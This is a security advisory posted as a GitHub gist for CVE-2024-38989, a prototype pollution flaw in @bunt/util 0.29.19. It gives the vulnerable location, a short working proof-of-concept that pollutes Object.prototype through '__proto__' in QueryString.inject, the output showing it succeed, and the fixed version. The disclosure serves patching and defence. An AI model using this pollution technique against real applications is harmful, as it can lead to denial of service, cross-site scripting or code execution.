Skip to content

Instantly share code, notes, and snippets.

@mestrtee
Last active July 29, 2024 18:09
Show Gist options
  • Save mestrtee/5e9830fb180a34d65f04fafb52d2b94b to your computer and use it in GitHub Desktop.
Save mestrtee/5e9830fb180a34d65f04fafb52d2b94b to your computer and use it in GitHub Desktop.
[CVE-2024-38989] Prototype Pollution vulnerability affecting bunt/util, version 0.29.19

Overview

Affected versions of this package are vulnerable to Prototype Pollution. An attacker can manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Location:

@bunt/util/dist/esm/qs.js:12

PoC:

(async () => {
  const lib = await import('@bunt/util');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.QueryString.inject ([["__proto__"], "polluted"], true,{})
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack: {}
After Attack: {"polluted":true}

Patch

upgrade to version 0.29.26 or a later version.

Reference

https://github.com/izatop/bunt/commit/c55201a8cee03e5282f99874dead988c80d31db7

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment